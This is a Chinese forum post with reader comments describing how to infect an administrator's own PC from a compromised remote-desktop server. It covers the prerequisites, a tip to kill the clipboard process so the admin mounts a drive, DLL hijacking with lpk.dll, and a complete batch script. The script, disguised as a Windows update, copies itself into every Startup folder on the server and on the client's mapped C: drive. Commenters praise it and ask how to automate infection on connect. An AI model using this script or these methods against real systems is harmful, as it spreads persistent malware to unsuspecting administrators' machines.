远程桌面反向感染管理个人机
前置条件
1.mstsc需要开启驱动器C盘(win2008及以上只需剪切板即可文件传输)
2.win2003 如果要复制文件必须开驱动器
思路:
遍历tsclient的自启动目录 -》 添加执行程序 -》个人机重启 -》 上线
++
猥琐一些的思路:脚本找不到挂载磁盘的情况下直接结束rdpclip.exe 使管理员无法使用剪切板功能,他可能在修复时会挂载上磁盘
++
@ptvip 老司机思路,传lpk.dll
写bat脚本寻找所有挂载磁盘存在的exe文件,把每个目录都写一个lpk.dll
更新关于dll劫持
(lpk.dll只针对xp系统,高于xp的微软已经用KnownDLLs做了防范,需要发现其他的dll进行劫持)
++
@Solo_LD 结合蜜罐,反向搞黑客
@echo off
echo Updating Windows ...
@echo off
timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat "%%a" >nul 2>&1
copy C:\temp\run.bat "%%a" >nul 2>&1
copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
del /q %TEMP%\temp_00.txt >nul 2>&1
评论60次
我擦。这思路真6了。很猥琐。就是有点被动。
小文件我喜欢直接用nc传上去。
这个确实够叼,我看文章里面讲这个漏洞最先是腾讯发现的。
好强的穿透力
这思路确实猥琐,O(∩_∩)O
很猥琐的思路,学xi了。可以搞管理员了
虚拟机下能不能反感染个人机呢?
虚拟机的逃逸漏洞 比如这个https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware
这个漏洞只针对vmware ,如果虚拟机是hyper-v 或者kvm呢
mark....思路不错
虚拟机 也 挂了 ,, 看来虚拟机挂在 物理盘 需要注意啊
这个办法是搞机房管理必备,早些年就集成到远控里面了,拿到各种密码就畅通无阻了。
我要改改我这毛病了,链接服务器,把本机的所有磁盘都链接上去了
from: https://threathunter.org/topic/59520c2f47796d2341e03e3e https://www.mdsec.co.uk/2017/06/rdpinception/ https://github.com/mdsecactivebreach/RDPInception/blob/master/run.bat
哇靠哦 那么恶毒的姿势
我都是虚拟机中远程,这样就算中招了也是虚拟机。
大多数情况下 不能直接挂载其他会话的磁盘. mimikatz集成了rdp hijacking的功能
我擦。这个思路很淫荡啊。 就是需要等。
这个脚本可以改成后台运行然后等有人连接时自动感染吗?
思路是这个 监控连接就很好做了 比如监控远程端口状态,quser状态等等 猥琐一些的思路可以再找不到挂载磁盘的情况下直接结束rdpclip.exe 使管理无法使用剪切板功能,可能在修复时会挂载上磁盘
这个脚本可以改成后台运行然后等有人连接时自动感染吗?
虚拟机下能不能反感染个人机呢?
虚拟机的逃逸漏洞 比如这个https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware
虚拟机下能不能反感染个人机呢?